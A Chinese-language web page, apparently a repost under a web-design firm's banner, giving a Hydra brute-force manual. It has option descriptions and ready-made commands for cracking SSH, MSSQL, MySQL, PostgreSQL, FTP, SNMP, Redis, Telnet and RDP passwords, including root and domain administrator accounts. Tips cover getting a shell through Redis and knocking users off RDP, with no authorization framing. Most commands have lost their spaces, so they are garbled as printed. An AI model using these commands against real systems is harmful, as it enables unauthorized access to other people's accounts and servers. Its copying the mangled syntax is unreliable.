☰
九头蛇(hydra)使用手册
2026/10/8 7:43:30 网站建设 项目流程

Hydra 是著名组织 thc 的一款开源的暴力破解密码工具、功能非常强大,几乎支持所有协议的在线破解。linux 版和 windows 版的 hydra 在使用上几乎是一样的(kali 默认安装)。

下载地址:https://github.com/vanhauser-thc/thc-hydra

hydra使用语法:

Hydra 参数 IP 服务

参数说明:

-l login 小写,指定用户名进行破解-Lfile 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-Pfile 大写,用于指定密码字典。-s 指定非默认端口-e ns 额外的选项,n:空密码试探,s:使用用户名作为密码试探-Mfile 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-T所有IP总共用多少进程来跑。-w time 设置最大超时时间,单位-v/-V显示详细过程[-vV显示详细测试过程(常用)]-R恢复爆破(如果破解中断了,下次执行 hydra-R/path/to/hydra.restore 就可以继续任务。)-x 自定义密码。

爆破 ssh 密码

hydra-Luser.txt-Ppassword.txt-t8-vV-ens192.168.154.131ssh

爆破成功会提示 password found

使用 -o 选项保存文件。

hydra-Luser.txt-Ppassword.txt-ens-t8-vV-ores.txt192.168.154.131ssh

爆破 ssh 的 root 密码

centos6 以后 root 弱口令已比较少了,centos5以前的系统还是很靠谱的。支持基于证书登陆的ssh爆破。
除了linux一些路由交换设备的ssh也可以尝试。

hydra-lroot-Ppwd.txt-ens-f-ossh_res.txt-t8-T16-w20-vVssh://192.168.5.16

批量爆破 mssql

hydra-Luser.txt-Ppassword.txt-ens-f-ores.txt-Mtarget.txt-t8-T16-w20-vVmssql

批量爆破 mssql 的sa 密码

hydra-lsa-Ppassword.txt-ens-f-ores.txt-Mtarget.txt-t8-T16-w20-vVmssql

爆破 mysql 的 root 密码

hydra-lroot-Ppwd.txt-ens-f-omysql_res.txt-Mtarget_mysql.txt-t8-T16-w20-vVmysql

爆破 postgresql 的 postgres 密码。

类似 mysql

hydra-lpostgres-P/tmp/wordsdict/pwd.txt-ens-f-opg_res.txt-Mpostgres_login.txt-t8-T16-w20-vVpostgres

FTP 协议破解

hydra-Luser.txt-Ppassword.txt-ens-f-oftp_res.txt-t8-T16-w20-vVftp://192.168.5.16

扫描SNMP弱口令

hydra-Ppwd.txt-Mip.txt-osave.log snmp

-P 指定密码字典,-M指定目标IP文件(一行一个IP地址),-o指定结果输出文件,最后指定扫描协议SNMP。

爆破 redis 弱口令

redis 只需要指定密码字典文件。 用户名留空即可。
运气比较好, 目标机器 redis 是以 root 权限在运行的话 getshell 就很快了,参考文章利用redis写webshell。

hydra-Ppwd.txt-ens-f-oredis_res.txt-t8-T16-w20-vVredis://192.168.5.16

爆破 win/linux 的 telnet

某些路由交换设备上可能会使用telnet服务

hydra-ladministrator-Ppwd.txt-ens-f-otelnet_res.txt-Mtelnet_login.txt-t8-T16-w20-vVtelnet
hydra-lroot-Ppwd.txt-ens-f-otelnet_res.txt-Mtelnet_login.txt-t8-T16-w20-vVtelnet

爆破 windows rdp 管理密码

一旦爆破成功它会尝试登陆 一次, 如果你爆的那个用户当前正在线, 后果就是直接把对方蹬出去。

最好用最新版的 windows 平台的 hydra,而不是kali的。

hydra-ladministrator-Ppwd.txt-ens-f-ordp_res.txt-t4-w20-vVrdp://192.168.5.16

上面只是爆破目标 windows 的本地管理员密码, 我们也可以直接用它来爆破指定的域用户密码

hydra-lrootkit\\administrator-Ppasswd.txt-ens-f-ordp_res.txt-t4-w20-vVrdp://192.168.5.16

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询